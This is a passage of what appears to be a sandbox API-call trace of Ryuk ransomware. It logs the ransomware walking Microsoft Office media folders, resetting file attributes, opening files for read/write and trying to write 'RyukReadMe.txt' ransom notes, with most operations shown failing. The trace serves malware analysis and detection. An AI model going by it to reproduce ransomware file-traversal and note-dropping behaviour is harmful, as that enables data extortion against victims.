hTemplateFile=0x0) returned 0xffffffffffffffff [0135.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.746] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.746] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.746] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG", dwFileAttributes=0x80) returned 0 [0135.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0315447.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.747] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.747] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.747] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF", dwFileAttributes=0x80) returned 0 [0135.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332268.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332268.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.747] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.747] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.747] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.747] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF", dwFileAttributes=0x80) returned 0 [0135.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.748] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.748] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.748] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.748] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF", dwFileAttributes=0x80) returned 0 [0135.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0335112.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.749] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.749] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF", dwFileAttributes=0x80) returned 0 [0135.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0336075.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0336075.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.749] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.749] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0135.749] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0135.749] SetLastError (dwErrCode=0x0) [0135.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.750] GetLastError () returned 0x5 [0135.750] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.750] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.750] SetLastError (dwErrCode=0x0) [0135.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.750] GetLastError () returned 0x5 [0135.750] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.750] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.750] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.750] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.750] SetLastError (dwErrCode=0x0) [0135.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.750] GetLastError () returned 0x5 [0135.750] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.750] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML", dwFileAttributes=0x80) returned 0 [0135.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0135.751] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0135.751] SetLastError (dwErrCode=0x0) [0135.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.752] GetLastError () returned 0x5 [0135.752] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.752] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.752] SetLastError (dwErrCode=0x0) [0135.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.752] GetLastError () returned 0x5 [0135.752] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0135.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.752] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0135.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF", dwFileAttributes=0x80) returned 0 [0135.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF", dwFileAttributes=0x80) returned 0 [0135.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18181_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.757] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF", dwFileAttributes=0x80) returned 0 [0135.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18182_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.757] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF", dwFileAttributes=0x80) returned 0 [0135.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.758] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF", dwFileAttributes=0x80) returned 0 [0135.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18185_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF", dwFileAttributes=0x80) returned 0 [0135.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18187_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.761] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.761] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF", dwFileAttributes=0x80) returned 0 [0135.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18189_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18189_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.762] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF", dwFileAttributes=0x80) returned 0 [0135.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18190_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18190_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.762] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF", dwFileAttributes=0x80) returned 0 [0135.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18191_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.763] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF", dwFileAttributes=0x80) returned 0 [0135.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18192_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18192_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.764] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF", dwFileAttributes=0x80) returned 0 [0135.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18193_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.765] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF", dwFileAttributes=0x80) returned 0 [0135.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18194_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.765] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF", dwFileAttributes=0x80) returned 0 [0135.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18196_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.766] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF", dwFileAttributes=0x80) returned 0 [0135.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18197_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18197_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.767] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.767] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF", dwFileAttributes=0x80) returned 0 [0135.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18198_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18198_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.767] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF", dwFileAttributes=0x80) returned 0 [0135.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18199_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18199_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.768] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF", dwFileAttributes=0x80) returned 0 [0135.768] CreateFileW 